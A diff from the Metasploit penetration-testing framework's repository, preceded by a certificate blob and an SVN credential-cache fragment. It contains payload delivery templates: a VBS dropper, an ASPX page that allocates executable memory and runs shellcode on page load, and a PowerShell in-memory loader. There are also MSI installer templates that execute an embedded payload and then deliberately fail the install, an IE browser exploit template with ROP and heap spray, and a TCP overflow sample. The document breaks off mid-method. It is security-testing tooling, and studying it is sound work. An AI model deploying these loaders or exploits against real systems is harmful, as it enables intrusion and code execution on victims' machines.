MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
K 8
failures
V 1
8
K 15
svn:realmstring
V 30
https://www.metasploit.com:443
END

8
data/templates/scripts/to_exe.vbs.template
View File

@ -1,5 +1,5 @@
Function %{var_func}()
%{var_shellcode}
%{var_shellcode} = "%{hex_shellcode}"
Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@ -10,9 +10,11 @@ Function %{var_func}()
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
%{var_obj}.CreateFolder(%{var_basedir})
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
%{var_stream}.Write %{var_bytes}
For i = 1 to Len(%{var_shellcode}) Step 2
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
Next
%{var_stream}.Close
Dim %{var_shell}
Set %{var_shell} = CreateObject("Wscript.Shell")

21
data/templates/scripts/to_mem.aspx.template Normal file
View File

@ -0,0 +1,21 @@
<%%@ Page Language="C#" AutoEventWireup="true" %%>
<%%@ Import Namespace="System.IO" %%>
<script runat="server">
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
protected void Page_Load(object sender, EventArgs e)
{
%{shellcode}
IntPtr %{var_funcAddr} = VirtualAlloc(IntPtr.Zero,(UIntPtr)%{var_bytearray}.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(%{var_bytearray},0,%{var_funcAddr},%{var_bytearray}.Length);
IntPtr %{var_threadId} = IntPtr.Zero;
IntPtr %{var_hThread} = CreateThread(IntPtr.Zero,UIntPtr.Zero,%{var_funcAddr},IntPtr.Zero,0,ref %{var_threadId});
}
</script>

2
data/templates/scripts/to_mem_dotnet.ps1.template
View File

@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
$%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
%{shellcode}
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }

3
data/templates/src/msi/.gitignore vendored Normal file
View File

@ -0,0 +1,3 @@
*.msi
*.wixobj
*.wixpdb

7
data/templates/src/msi/COMPILING.txt Normal file
View File

@ -0,0 +1,7 @@
Compile using WiX: http://wixtoolset.org
Recompile with a larger buffer file to increase the available
buffer size for larger payloads if required.
candle template_x86_windows.wxs
light template_x86_windows.wixobj

1
data/templates/src/msi/buffer Normal file
View File

File diff suppressed because one or more lines are too long

18
data/templates/src/msi/compile.bat Normal file
View File

@ -0,0 +1,18 @@
@echo off
REM Set PATH to location of your WiX binaries
SET PATH=%PATH%;c:\tools\local\wix38-binaries\
@echo on
candle template_windows.wxs
light template_windows.wixobj
copy template_windows.msi ..\..\template_windows.msi
del template_windows.msi
del template_windows.wixobj
del template_windows.wixpdb
candle template_nouac_windows.wxs
light template_nouac_windows.wixobj
copy template_nouac_windows.msi ..\..\template_nouac_windows.msi
del template_nouac_windows.msi
del template_nouac_windows.wixobj
del template_nouac_windows.wixpdb

38
data/templates/src/msi/template_nouac_windows.wxs Normal file
View File

@ -0,0 +1,38 @@
<?xml version='1.0' encoding='windows-1252'?>
<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
<Product Name='Foobar 1.0' Id='*'
Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" InstallPrivileges="limited" />
<Media Id='1' />
<Directory Id='TARGETDIR' Name='SourceDir'>
<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
<Condition>0</Condition>
</Component>
</Directory>
<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
<Binary Id='Payload' SourceFile='buffer' />
<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='yes' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
<Feature Id='Complete' Level='1'>
<ComponentRef Id='MyComponent' />
</Feature>
<!-- Define ALLUSERS with a blank value -->
<Property Id="ALLUSERS" Secure="yes"/>
<InstallExecuteSequence>
<ResolveSource After="CostInitialize" />
<Custom Action="ExecPayload" After="InstallInitialize" />
<Custom Action="FailInstallation" Before="InstallFiles" />
</InstallExecuteSequence>
</Product>
</Wix>

35
data/templates/src/msi/template_windows.wxs Normal file
View File

@ -0,0 +1,35 @@
<?xml version='1.0' encoding='windows-1252'?>
<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
<Product Name='Foobar 1.0' Id='*'
Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />
<Media Id='1' />
<Directory Id='TARGETDIR' Name='SourceDir'>
<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
<Condition>0</Condition>
</Component>
</Directory>
<!-- Ensure buffer file is large enough to handle the PE you are inserting -->
<Binary Id='Payload' SourceFile='buffer' />
<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
<CustomAction Id='ExecPayload' BinaryKey='Payload' Impersonate='no' Execute='deferred' ExeCommand='' Return='asyncNoWait'/>
<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
<Feature Id='Complete' Level='1'>
<ComponentRef Id='MyComponent' />
</Feature>
<InstallExecuteSequence>
<ResolveSource After="CostInitialize" />
<Custom Action="ExecPayload" After="InstallInitialize" />
<Custom Action="FailInstallation" Before="InstallFiles" />
</InstallExecuteSequence>
</Product>
</Wix>

BIN
data/templates/template_nouac_windows.msi Normal file
View File

Binary file not shown.

BIN
data/templates/template_windows.msi Normal file
View File

Binary file not shown.

1
data/wordlists/http_owa_common.txt
View File

@ -1,5 +1,6 @@
aspnet_client/
Autodiscover/
exchange/
ecp/
EWS/
Microsoft-Server-ActiveSync/

2
data/wordlists/sap_icm_paths.txt
View File

@ -1,3 +1,4 @@
/AdapterFramework/version/version.jsp
/AdobeDocumentServices/Config
/AdobeDocumentServices/Config?wsdl
/AE/index.jsp
@ -319,6 +320,7 @@
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
/webdynpro/dispatcher/sap.com/tc~wd~tools
/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer

1
data/wordlists/snmp_default_pass.txt
View File

@ -92,6 +92,7 @@ root
router
rw
rwa
s!a@m#n$p%c
san-fran
sanfran
scotty

22
documentation/samples/framework/dump_module_info.rb
View File

@ -13,22 +13,22 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base'
if (ARGV.empty?)
puts "Usage: #{File.basename(__FILE__)} module_name"
exit
puts "Usage: #{File.basename(__FILE__)} module_name"
exit
end
modname = ARGV.shift
framework = Msf::Simple::Framework.create
begin
# Create the module instance.
mod = framework.modules.create(modname)
if not mod
puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
else
# Dump the module's information in readable text format.
puts Msf::Serializer::ReadableText.dump_module(mod)
end
# Create the module instance.
mod = framework.modules.create(modname)
if not mod
puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
else
# Dump the module's information in readable text format.
puts Msf::Serializer::ReadableText.dump_module(mod)
end
rescue
puts "Error: #{$!}\n\n#{$@.join("\n")}"
puts "Error: #{$!}\n\n#{$@.join("\n")}"
end

14
documentation/samples/framework/encode_file.rb
View File

@ -13,18 +13,18 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base'
if (ARGV.empty?)
puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
exit
puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
exit
end
framework = Msf::Simple::Framework.create
begin
# Create the encoder instance.
mod = framework.encoders.create(ARGV.shift)
# Create the encoder instance.
mod = framework.encoders.create(ARGV.shift)
puts(Msf::Simple::Buffer.transform(
mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
puts(Msf::Simple::Buffer.transform(
mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
rescue
puts "Error: #{$!}\n\n#{$@.join("\n")}"
puts "Error: #{$!}\n\n#{$@.join("\n")}"
end

2
documentation/samples/framework/enumerate_modules.rb
View File

@ -16,5 +16,5 @@ framework = Msf::Simple::Framework.create
# Enumerate each module in the framework.
framework.modules.each_module { |name, mod|
puts "#{mod.type}: #{name}"
puts "#{mod.type}: #{name}"
}

40
documentation/samples/framework/run_exploit_using_base.rb
View File

@ -14,8 +14,8 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base'
if (ARGV.length == 0)
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
exit
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
exit
end
framework = Msf::Simple::Framework.create
@ -25,28 +25,28 @@ input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::Stdio.new
begin
# Initialize the exploit instance
exploit = framework.exploits.create(exploit_name)
# Initialize the exploit instance
exploit = framework.exploits.create(exploit_name)
# Fire it off.
session = exploit.exploit_simple(
'Payload' => payload_name,
'OptionStr' => ARGV.join(' '),
'LocalInput' => input,
'LocalOutput' => output)
# Fire it off.
session = exploit.exploit_simple(
'Payload' => payload_name,
'OptionStr' => ARGV.join(' '),
'LocalInput' => input,
'LocalOutput' => output)
# If a session came back, try to interact with it.
if (session)
output.print_status("Session #{session.sid} created, interacting...")
output.print_line
# If a session came back, try to interact with it.
if (session)
output.print_status("Session #{session.sid} created, interacting...")
output.print_line
session.init_ui(input, output)
session.init_ui(input, output)
session.interact
else
output.print_line("Exploit completed, no session was created.")
end
session.interact
else
output.print_line("Exploit completed, no session was created.")
end
rescue
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
end

60
documentation/samples/framework/run_exploit_using_core.rb
View File

@ -15,8 +15,8 @@ $:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
require 'msf/base'
if (ARGV.length == 0)
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
exit
puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
exit
end
framework = Msf::Simple::Framework.create
@ -26,43 +26,43 @@ input = Rex::Ui::Text::Input::Stdio.new
output = Rex::Ui::Text::Output::Stdio.new
begin
# Create the exploit driver instance.
driver = Msf::ExploitDriver.new(framework)
# Create the exploit driver instance.
driver = Msf::ExploitDriver.new(framework)
# Initialize the exploit driver's exploit and payload instance
driver.exploit = framework.exploits.create(exploit_name)
driver.payload = framework.payloads.create(payload_name)
# Initialize the exploit driver's exploit and payload instance
driver.exploit = framework.exploits.create(exploit_name)
driver.payload = framework.payloads.create(payload_name)
# Import options specified in VAR=VAL format from the supplied command
# line.
driver.exploit.datastore.import_options_from_s(ARGV.join(' '))
# Import options specified in VAR=VAL format from the supplied command
# line.
driver.exploit.datastore.import_options_from_s(ARGV.join(' '))
# Share the exploit's datastore with the payload.
driver.payload.share_datastore(driver.exploit.datastore)
# Share the exploit's datastore with the payload.
driver.payload.share_datastore(driver.exploit.datastore)
# Initialize the target index to what's in the exploit's data store or
# zero by default.
driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i
# Initialize the target index to what's in the exploit's data store or
# zero by default.
driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i
# Initialize the exploit and payload user interfaces.
driver.exploit.init_ui(input, output)
driver.payload.init_ui(input, output)
# Initialize the exploit and payload user interfaces.
driver.exploit.init_ui(input, output)
driver.payload.init_ui(input, output)
# Fire it off.
session = driver.run
# Fire it off.
session = driver.run
# If a session came back, try to interact with it.
if (session)
output.print_status("Session #{session.sid} created, interacting...")
output.print_line
# If a session came back, try to interact with it.
if (session)
output.print_status("Session #{session.sid} created, interacting...")
output.print_line
session.init_ui(input, output)
session.init_ui(input, output)
session.interact
else
output.print_line("Exploit completed, no session was created.")
end
session.interact
else
output.print_line("Exploit completed, no session was created.")
end
rescue
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
end

44
documentation/samples/modules/auxiliary/sample.rb
View File

@ -15,31 +15,31 @@ require 'msf/core'
###
class Metasploit4 < Msf::Auxiliary
def initialize(info={})
super(update_info(info,
'Name' => 'Sample Auxiliary Module',
'Description' => 'Sample Auxiliary Module',
'Author' => ['hdm'],
'License' => MSF_LICENSE,
'Actions' =>
[
['Default Action'],
['Another Action']
]
))
def initialize(info={})
super(update_info(info,
'Name' => 'Sample Auxiliary Module',
'Description' => 'Sample Auxiliary Module',
'Author' => ['hdm'],
'License' => MSF_LICENSE,
'Actions' =>
[
['Default Action'],
['Another Action']
]
))
end
end
def run
print_status("Running the simple auxiliary module with action #{action.name}")
end
def run
print_status("Running the simple auxiliary module with action #{action.name}")
end
def auxiliary_commands
return { "aux_extra_command" => "Run this auxiliary test commmand" }
end
def auxiliary_commands
return { "aux_extra_command" => "Run this auxiliary test commmand" }
end
def cmd_aux_extra_command(*args)
print_status("Running inside aux_extra_command()")
end
def cmd_aux_extra_command(*args)
print_status("Running inside aux_extra_command()")
end
end

34
documentation/samples/modules/encoders/sample.rb
View File

@ -13,23 +13,23 @@
###
class Metasploit4 < Msf::Encoder
def initialize
super(
'Name' => 'Sample Encoder',
'Description' => %q{
Sample encoder that just returns the block it's passed
when encoding occurs.
},
'License' => MSF_LICENSE,
'Author' => 'skape',
'Arch' => ARCH_ALL)
end
def initialize
super(
'Name' => 'Sample Encoder',
'Description' => %q{
Sample encoder that just returns the block it's passed
when encoding occurs.
},
'License' => MSF_LICENSE,
'Author' => 'skape',
'Arch' => ARCH_ALL)
end
#
# Returns the unmodified buffer to the caller.
#
def encode_block(state, buf)
buf
end
#
# Returns the unmodified buffer to the caller.
#
def encode_block(state, buf)
buf
end
end

216
documentation/samples/modules/exploits/ie_browser.rb
View File

@ -15,133 +15,133 @@ require 'msf/core'
#
###
class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
# Set :classid and :method for ActiveX exploits. For example:
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
# :method => "SetShapeNodeType",
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "8.0",
:ua_maxver => "10.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:rank => NormalRanking
})
# Set :classid and :method for ActiveX exploits. For example:
# :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
# :method => "SetShapeNodeType",
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "8.0",
:ua_maxver => "10.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:rank => NormalRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "Module Name",
'Description' => %q{
This template covers IE8/9/10, and uses the user-agent HTTP header to detect
the browser version. Please note IE8 and newer may emulate an older IE version
in compatibility mode, in that case the module won't be able to detect the
browser correctly.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
],
'Payload' =>
{
'BadChars' => "\x00", # js_property_spray
'StackAdjustment' => -3500
},
'Privileged' => false,
'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0))
end
def initialize(info={})
super(update_info(info,
'Name' => "Module Name",
'Description' => %q{
This template covers IE8/9/10, and uses the user-agent HTTP header to detect
the browser version. Please note IE8 and newer may emulate an older IE version
in compatibility mode, in that case the module won't be able to detect the
browser correctly.
},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r' ],
'References' =>
[
[ 'URL', 'http://metasploit.com' ]
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 9 on Windows 7', { 'Rop' => :jre } ],
[ 'IE 10 on Windows 8', { 'Rop' => :jre } ]
],
'Payload' =>
{
'BadChars' => "\x00", # js_property_spray
'StackAdjustment' => -3500
},
'Privileged' => false,
'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0))
end
def get_target(agent)
return target if target.name != 'Automatic'
def get_target(agent)
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
when '6.2'
os_name = 'Windows 8'
end
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
when '6.2'
os_name = 'Windows 8'
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
return t
end
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
return t
end
end
nil
end
nil
end
def get_payload(t)
stack_pivot = "\x41\x42\x43\x44"
code = payload.encoded
def get_payload(t)
stack_pivot = "\x41\x42\x43\x44"
code = payload.encoded
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
case t['Rop']
when :msvcrt
print_status("Using msvcrt ROP")
rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
else
print_status("Using JRE ROP")
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
end
else
print_status("Using JRE ROP")
rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
end
rop_payload
end
rop_payload
end
def get_html(t)
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
html = %Q|
<script>
#{js_property_spray}
def get_html(t)
js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
html = %Q|
<script>
#{js_property_spray}
var s = unescape("#{js_p}");
sprayHeap({shellcode:s});
</script>
|
var s = unescape("#{js_p}");
sprayHeap({shellcode:s});
</script>
|
html.gsub(/^\t\t/, '')
end
html.gsub(/^\t\t/, '')
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("Requesting: #{request.uri}")
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
print_status("Requesting: #{request.uri}")
target = get_target(agent)
if target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
target = get_target(agent)
if target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
print_status("Target selected as: #{target.name}")
html = get_html(target)
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
end
print_status("Target selected as: #{target.name}")
html = get_html(target)
send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
end
end

116
documentation/samples/modules/exploits/sample.rb
View File

@ -15,71 +15,71 @@ require 'msf/core'
###
class Metasploit4 < Msf::Exploit::Remote
#
# This exploit affects TCP servers, so we use the TCP client mixin.
#
include Exploit::Remote::Tcp
#
# This exploit affects TCP servers, so we use the TCP client mixin.
#
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Sample Exploit',
'Description' => %q{
This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a parsing bug.
},
'License' => MSF_LICENSE,
'Author' => ['skape'],
'References' =>
[
],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Windows All
[
'Windows XP/Vista/7/8',
{
'Platform' => 'win',
'Ret' => 0x41424344
}
],
],
'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Sample Exploit',
'Description' => %q{
This exploit module illustrates how a vulnerability could be exploited
in an TCP server that has a parsing bug.
},
'License' => MSF_LICENSE,
'Author' => ['skape'],
'References' =>
[
],
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Windows All
[
'Windows XP/Vista/7/8',
{
'Platform' => 'win',
'Ret' => 0x41424344
}
],
],
'DisclosureDate' => "Apr 1 2013",
'DefaultTarget' => 0))
end
#
# The sample exploit just indicates that the remote host is always
# vulnerable.
#
def check
Exploit::CheckCode::Vulnerable
end
#
# The sample exploit just indicates that the remote host is always
# vulnerable.
#
def check
Exploit::CheckCode::Vulnerable
end
#
# The exploit method connects to the remote service and sends 1024 random bytes
# followed by the fake return address and then the payload.
#
def exploit
connect
#
# The exploit method connects to the remote service and sends 1024 random bytes
# followed by the fake return address and then the payload.
#
def exploit
connect
print_status("Sending #{payload.encoded.length} byte payload...")
print_status("Sending #{payload.encoded.length} byte payload...")
# Build the buffer for transmission
buf = rand_text_alpha(1024)
buf << [ target.ret ].pack('V')
buf << payload.encoded
# Build the buffer for transmission
buf = rand_text_alpha(1024)
buf << [ target.ret ].pack('V')
buf << payload.encoded
# Send it off
sock.put(buf)
sock.get_once
# Send it off
sock.put(buf)
sock.get_once
handler
end
handler
end
end

28
documentation/samples/modules/nops/sample.rb
View File

@ -15,20 +15,20 @@ require 'msf/core'
###
class Metasploit4 < Msf::Nop
def initialize
super(
'Name' => 'Sample NOP Generator',
'Description' => 'Sample single-byte NOP generator',
'License' => MSF_LICENSE,
'Author' => 'skape',
'Arch' => ARCH_X86)
end
def initialize
super(
'Name' => 'Sample NOP Generator',
'Description' => 'Sample single-byte NOP generator',
'License' => MSF_LICENSE,
'Author' => 'skape',
'Arch' => ARCH_X86)
end
#
# Returns a string of 0x90's for the supplied length.
#
def generate_sled(length, opts)
"\x90" * length
end
#
# Returns a string of 0x90's for the supplied length.
#
def generate_sled(length, opts)
"\x90" * length
end
end

30
documentation/samples/modules/payloads/singles/sample.rb
View File

@ -14,21 +14,21 @@ require 'msf/core'
###
module Metasploit4
include Msf::Payload::Single
include Msf::Payload::Single
def initialize(info = {})
super(update_info(info,
'Name' => 'Debugger Trap',
'Description' => 'Causes a debugger trap exception through int3',
'License' => MSF_LICENSE,
'Author' => 'skape',
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Payload' => "\xcc"
}
))
end
def initialize(info = {})
super(update_info(info,
'Name' => 'Debugger Trap',
'Description' => 'Causes a debugger trap exception through int3',
'License' => MSF_LICENSE,
'Author' => 'skape',
'Platform' => 'win',
'Arch' => ARCH_X86,
'Payload' =>
{
'Payload' => "\xcc"
}
))
end
end

38
documentation/samples/modules/post/sample.rb
View File

@ -15,26 +15,26 @@ require 'msf/core/post/common'
###
class Metasploit4 < Msf::Post
include Msf::Post::Common
include Msf::Post::Common
def initialize(info={})
super(update_info(info,
'Name' => 'Sample Post Module',
'Description' => %q{Sample Post Module},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r'],
'Platform' => [ 'win'],
'SessionTypes' => [ "shell", "meterpreter" ]
))
end
def initialize(info={})
super(update_info(info,
'Name' => 'Sample Post Module',
'Description' => %q{Sample Post Module},
'License' => MSF_LICENSE,
'Author' => [ 'sinn3r'],
'Platform' => [ 'win'],
'SessionTypes' => [ "shell", "meterpreter" ]
))
end
#
# This post module runs a ipconfig command and returns the output
#
def run
print_status("Executing ipconfig on remote machine")
o = cmd_exec("ipconfig")
print_line(o)
end
#
# This post module runs a ipconfig command and returns the output
#
def run
print_status("Executing ipconfig on remote machine")
